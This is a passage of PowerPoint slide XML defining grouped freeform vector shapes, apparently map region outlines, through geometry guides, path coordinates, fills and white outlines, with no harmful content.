                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35855" name="Group 607"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="69" y="1063"/>
              <a:ext cx="5553" cy="2819"/>
              <a:chOff x="69" y="1063"/>
              <a:chExt cx="5553" cy="2819"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35873" name="Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2833" y="2080"/>
                <a:ext cx="71" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 71"/>
                  <a:gd name="T1" fmla="*/ 9 h 44"/>
                  <a:gd name="T2" fmla="*/ 58 w 71"/>
                  <a:gd name="T3" fmla="*/ 15 h 44"/>
                  <a:gd name="T4" fmla="*/ 61 w 71"/>
                  <a:gd name="T5" fmla="*/ 17 h 44"/>
                  <a:gd name="T6" fmla="*/ 65 w 71"/>
                  <a:gd name="T7" fmla="*/ 21 h 44"/>
                  <a:gd name="T8" fmla="*/ 71 w 71"/>
                  <a:gd name="T9" fmla="*/ 19 h 44"/>
                  <a:gd name="T10" fmla="*/ 70 w 71"/>
                  <a:gd name="T11" fmla="*/ 24 h 44"/>
                  <a:gd name="T12" fmla="*/ 70 w 71"/>
                  <a:gd name="T13" fmla="*/ 28 h 44"/>
                  <a:gd name="T14" fmla="*/ 67 w 71"/>
                  <a:gd name="T15" fmla="*/ 26 h 44"/>
                  <a:gd name="T16" fmla="*/ 64 w 71"/>
                  <a:gd name="T17" fmla="*/ 30 h 44"/>
                  <a:gd name="T18" fmla="*/ 64 w 71"/>
                  <a:gd name="T19" fmla="*/ 35 h 44"/>
                  <a:gd name="T20" fmla="*/ 59 w 71"/>
                  <a:gd name="T21" fmla="*/ 32 h 44"/>
                  <a:gd name="T22" fmla="*/ 57 w 71"/>
                  <a:gd name="T23" fmla="*/ 34 h 44"/>
                  <a:gd name="T24" fmla="*/ 55 w 71"/>
                  <a:gd name="T25" fmla="*/ 29 h 44"/>
                  <a:gd name="T26" fmla="*/ 52 w 71"/>
                  <a:gd name="T27" fmla="*/ 33 h 44"/>
                  <a:gd name="T28" fmla="*/ 49 w 71"/>
                  <a:gd name="T29" fmla="*/ 43 h 44"/>
                  <a:gd name="T30" fmla="*/ 44 w 71"/>
                  <a:gd name="T31" fmla="*/ 41 h 44"/>
                  <a:gd name="T32" fmla="*/ 43 w 71"/>
                  <a:gd name="T33" fmla="*/ 38 h 44"/>
                  <a:gd name="T34" fmla="*/ 39 w 71"/>
                  <a:gd name="T35" fmla="*/ 30 h 44"/>
                  <a:gd name="T36" fmla="*/ 34 w 71"/>
                  <a:gd name="T37" fmla="*/ 37 h 44"/>
                  <a:gd name="T38" fmla="*/ 30 w 71"/>
                  <a:gd name="T39" fmla="*/ 43 h 44"/>
                  <a:gd name="T40" fmla="*/ 21 w 71"/>
                  <a:gd name="T41" fmla="*/ 43 h 44"/>
                  <a:gd name="T42" fmla="*/ 16 w 71"/>
                  <a:gd name="T43" fmla="*/ 38 h 44"/>
                  <a:gd name="T44" fmla="*/ 9 w 71"/>
                  <a:gd name="T45" fmla="*/ 31 h 44"/>
                  <a:gd name="T46" fmla="*/ 0 w 71"/>
                  <a:gd name="T47" fmla="*/ 37 h 44"/>
                  <a:gd name="T48" fmla="*/ 2 w 71"/>
                  <a:gd name="T49" fmla="*/ 32 h 44"/>
                  <a:gd name="T50" fmla="*/ 2 w 71"/>
                  <a:gd name="T51" fmla="*/ 27 h 44"/>
                  <a:gd name="T52" fmla="*/ 7 w 71"/>
                  <a:gd name="T53" fmla="*/ 19 h 44"/>
                  <a:gd name="T54" fmla="*/ 11 w 71"/>
                  <a:gd name="T55" fmla="*/ 16 h 44"/>
                  <a:gd name="T56" fmla="*/ 16 w 71"/>
                  <a:gd name="T57" fmla="*/ 11 h 44"/>
                  <a:gd name="T58" fmla="*/ 14 w 71"/>
                  <a:gd name="T59" fmla="*/ 9 h 44"/>
                  <a:gd name="T60" fmla="*/ 19 w 71"/>
                  <a:gd name="T61" fmla="*/ 6 h 44"/>
                  <a:gd name="T62" fmla="*/ 22 w 71"/>
                  <a:gd name="T63" fmla="*/ 7 h 44"/>
                  <a:gd name="T64" fmla="*/ 27 w 71"/>
                  <a:gd name="T65" fmla="*/ 5 h 44"/>
                  <a:gd name="T66" fmla="*/ 31 w 71"/>
                  <a:gd name="T67" fmla="*/ 5 h 44"/>
                  <a:gd name="T68" fmla="*/ 37 w 71"/>
                  <a:gd name="T69" fmla="*/ 4 h 44"/>
                  <a:gd name="T70" fmla="*/ 38 w 71"/>
                  <a:gd name="T71" fmla="*/ 2 h 44"/>
                  <a:gd name="T72" fmla="*/ 43 w 71"/>
                  <a:gd name="T73" fmla="*/ 1 h 44"/>
                  <a:gd name="T74" fmla="*/ 46 w 71"/>
                  <a:gd name="T75" fmla="*/ 2 h 44"/>
                  <a:gd name="T76" fmla="*/ 57 w 71"/>
                  <a:gd name="T77" fmla="*/ 5 h 44"/>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71"/>
                  <a:gd name="T118" fmla="*/ 0 h 44"/>
                  <a:gd name="T119" fmla="*/ 71 w 71"/>
                  <a:gd name="T120" fmla="*/ 44 h 44"/>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71" h="44">
                    <a:moveTo>
                      <a:pt x="57" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35874" name="Freeform 408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2830" y="2023"/>
                <a:ext cx="13" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 13"/>
                  <a:gd name="T1" fmla="*/ 16 h 17"/>
                  <a:gd name="T2" fmla="*/ 2 w 13"/>
                  <a:gd name="T3" fmla="*/ 12 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 13"/>
                  <a:gd name="T5" fmla="*/ 9 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 13"/>
                  <a:gd name="T7" fmla="*/ 6 h 17"/>
                  <a:gd name="T8" fmla="*/ 2 w 13"/>
                  <a:gd name="T9" fmla="*/ 2 h 17"/>
                  <a:gd name="T10" fmla="*/ 3 w 13"/>
                  <a:gd name="T11" fmla="*/ 1 h 17"/>
                  <a:gd name="T12" fmla="*/ 4 w 13"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 6 w 13"/>
                  <a:gd name="T15" fmla="*/ 1 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 13"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 9 w 13"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 13 w 13"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 12 w 13"/>
                  <a:gd name="T23" fmla="*/ 12 h 17"/>
                  <a:gd name="T24" fmla="*/ 11 w 13"/>
                  <a:gd name="T25" fmla="*/ 13 h 17"/>
                  <a:gd name="T26" fmla="*/ 11 w 13"/>
                  <a:gd name="T27" fmla="*/ 17 h 17"/>
                  <a:gd name="T28" fmla="*/ 10 w 13"/>
                  <a:gd name="T29" fmla="*/ 16 h 17"/>
                  <a:gd name="T30" fmla="*/ 6 w 13"/>
                  <a:gd name="T31" fmla="*/ 16 h 17"/>
                  <a:gd name="T32" fmla="*/ 1 w 13"/>
                  <a:gd name="T33" fmla="*/ 16 h 1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3"/>
                  <a:gd name="T52" fmla="*/ 0 h 17"/>
                  <a:gd name="T53" fmla="*/ 13 w 13"/>
                  <a:gd name="T54" fmla="*/ 17 h 1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3" h="17">
                    <a:moveTo>
                      <a:pt x="1" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC99FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35875" name="Freeform 409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2830" y="2023"/>
                <a:ext cx="13" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 13"/>
                  <a:gd name="T1" fmla="*/ 16 h 17"/>
                  <a:gd name="T2" fmla="*/ 2 w 13"/>
                  <a:gd name="T3" fmla="*/ 12 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 13"/>
                  <a:gd name="T5" fmla="*/ 9 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 13"/>
                  <a:gd name="T7" fmla="*/ 6 h 17"/>
                  <a:gd name="T8" fmla="*/ 2 w 13"/>
                  <a:gd name="T9" fmla="*/ 2 h 17"/>
                  <a:gd name="T10" fmla="*/ 3 w 13"/>
                  <a:gd name="T11" fmla="*/ 1 h 17"/>
                  <a:gd name="T12" fmla="*/ 4 w 13"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 6 w 13"/>
                  <a:gd name="T15" fmla="*/ 1 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 13"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 9 w 13"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 13 w 13"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 12 w 13"/>
                  <a:gd name="T23" fmla="*/ 12 h 17"/>
                  <a:gd name="T24" fmla="*/ 11 w 13"/>
                  <a:gd name="T25" fmla="*/ 13 h 17"/>
                  <a:gd name="T26" fmla="*/ 11 w 13"/>
                  <a:gd name="T27" fmla="*/ 17 h 17"/>
                  <a:gd name="T28" fmla="*/ 10 w 13"/>
                  <a:gd name="T29" fmla="*/ 16 h 17"/>
                  <a:gd name="T30" fmla="*/ 6 w 13"/>
                  <a:gd name="T31" fmla="*/ 16 h 17"/>
                  <a:gd name="T32" fmla="*/ 1 w 13"/>
                  <a:gd name="T33" fmla="*/ 16 h 1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3"/>
                  <a:gd name="T52" fmla="*/ 0 h 17"/>
                  <a:gd name="T53" fmla="*/ 13 w 13"/>
                  <a:gd name="T54" fmla="*/ 17 h 1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3" h="17">
                    <a:moveTo>
                      <a:pt x="1" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35876" name="Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3161" y="2064"/>
                <a:ext cx="55" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 55"/>
                  <a:gd name="T1" fmla="*/ 3 h 69"/>
                  <a:gd name="T2" fmla="*/ 3 w 55"/>
                  <a:gd name="T3" fmla="*/ 2 h 69"/>
                  <a:gd name="T4" fmla="*/ 7 w 55"/>
                  <a:gd name="T5" fmla="*/ 2 h 69"/>
                  <a:gd name="T6" fmla="*/ 11 w 55"/>
                  <a:gd name="T7" fmla="*/ 1 h 69"/>
                  <a:gd name="T8" fmla="*/ 14 w 55"/>
                  <a:gd name="T9" fmla="*/ 0 h 69"/>
                  <a:gd name="T10" fmla="*/ 16 w 55"/>
                  <a:gd name="T11" fmla="*/ 1 h 69"/>
                  <a:gd name="T12" fmla="*/ 18 w 55"/>
                  <a:gd name="T13" fmla="*/ 0 h 69"/>
                  <a:gd name="T14" fmla="*/ 21 w 55"/>
                  <a:gd name="T15" fmla="*/ 3 h 69"/>
                  <a:gd name="T16" fmla="*/ 24 w 55"/>
                  <a:gd name="T17" fmla="*/ 5 h 69"/>
                  <a:gd name="T18" fmla="*/ 26 w 55"/>
                  <a:gd name="T19" fmla="*/ 6 h 69"/>
                  <a:gd name="T20" fmla="*/ 28 w 55"/>
                  <a:gd name="T21" fmla="*/ 6 h 69"/>
                  <a:gd name="T22" fmla="*/ 28 w 55"/>
                  <a:gd name="T23" fmla="*/ 7 h 69"/>
                  <a:gd name="T24" fmla="*/ 29 w 55"/>
                  <a:gd name="T25" fmla="*/ 9 h 69"/>
                  <a:gd name="T26" fmla="*/ 32 w 55"/>
                  <a:gd name="T27" fmla="*/ 7 h 69"/>
                  <a:gd name="T28" fmla="*/ 36 w 55"/>
                  <a:gd name="T29" fmla="*/ 12 h 69"/>
                  <a:gd name="T30" fmla="*/ 39 w 55"/>
                  <a:gd name="T31" fmla="*/ 11 h 69"/>
                  <a:gd name="T32" fmla="*/ 41 w 55"/>
                  <a:gd name="T33" fmla="*/ 13 h 69"/>
                  <a:gd name="T34" fmla="*/ 41 w 55"/>
                  <a:gd name="T35" fmla="*/ 16 h 69"/>
                  <a:gd name="T36" fmla="*/ 41 w 55"/>
                  <a:gd name="T37" fmla="*/ 20 h 69"/>
                  <a:gd name="T38" fmla="*/ 41 w 55"/>
                  <a:gd name="T39" fmla="*/ 24 h 69"/>
                  <a:gd name="T40" fmla="*/ 44 w 55"/>
                  <a:gd name="T41" fmla="*/ 27 h 69"/>
                  <a:gd name="T42" fmla="*/ 46 w 55"/>
                  <a:gd name="T43" fmla="*/ 26 h 69"/>
                  <a:gd name="T44" fmla="*/ 47 w 55"/>
                  <a:gd name="T45" fmla="*/ 28 h 69"/>
                  <a:gd name="T46" fmla="*/ 46 w 55"/>
                  <a:gd name="T47" fmla="*/ 32 h 69"/>
                  <a:gd name="T48" fmla="*/ 47 w 55"/>
                  <a:gd name="T49" fmla="*/ 33 h 69"/>
                  <a:gd name="T50" fmla="*/ 48 w 55"/>
                  <a:gd name="T51" fmla="*/ 36 h 69"/>
                  <a:gd name="T52" fmla="*/ 51 w 55"/>
                  <a:gd name="T53" fmla="*/ 38 h 69"/>
                  <a:gd name="T54" fmla="*/ 53 w 55"/>
                  <a:gd name="T55" fmla="*/ 41 h 69"/>
                  <a:gd name="T56" fmla="*/ 53 w 55"/>
                  <a:gd name="T57" fmla="*/ 44 h 69"/>
                  <a:gd name="T58" fmla="*/ 53 w 55"/>
                  <a:gd name="T59" fmla="*/ 46 h 69"/>
                  <a:gd name="T60" fmla="*/ 55 w 55"/>
                  <a:gd name="T61" fmla="*/ 48 h 69"/>
                  <a:gd name="T62" fmla="*/ 53 w 55"/>
                  <a:gd name="T63" fmla="*/ 49 h 69"/>
                  <a:gd name="T64" fmla="*/ 51 w 55"/>
                  <a:gd name="T65" fmla="*/ 49 h 69"/>
                  <a:gd name="T66" fmla="*/ 49 w 55"/>
                  <a:gd name="T67" fmla="*/ 47 h 69"/>
                  <a:gd name="T68" fmla="*/ 48 w 55"/>
                  <a:gd name="T69" fmla="*/ 49 h 69"/>
                  <a:gd name="T70" fmla="*/ 46 w 55"/>
                  <a:gd name="T71" fmla="*/ 48 h 69"/>
                  <a:gd name="T72" fmla="*/ 44 w 55"/>
                  <a:gd name="T73" fmla="*/ 47 h 69"/>
                  <a:gd name="T74" fmla="*/ 43 w 55"/>
                  <a:gd name="T75" fmla="*/ 47 h 69"/>
                  <a:gd name="T76" fmla="*/ 42 w 55"/>
                  <a:gd name="T77" fmla="*/ 48 h 69"/>
                  <a:gd name="T78" fmla="*/ 41 w 55"/>
                  <a:gd name="T79" fmla="*/ 46 h 69"/>
                  <a:gd name="T80" fmla="*/ 39 w 55"/>
                  <a:gd name="T81" fmla="*/ 46 h 69"/>
                  <a:gd name="T82" fmla="*/ 37 w 55"/>
                  <a:gd name="T83" fmla="*/ 49 h 69"/>
                  <a:gd name="T84" fmla="*/ 38 w 55"/>
                  <a:gd name="T85" fmla="*/ 52 h 69"/>
                  <a:gd name="T86" fmla="*/ 37 w 55"/>
                  <a:gd name="T87" fmla="*/ 55 h 69"/>
                  <a:gd name="T88" fmla="*/ 37 w 55"/>
                  <a:gd name="T89" fmla="*/ 58 h 69"/>
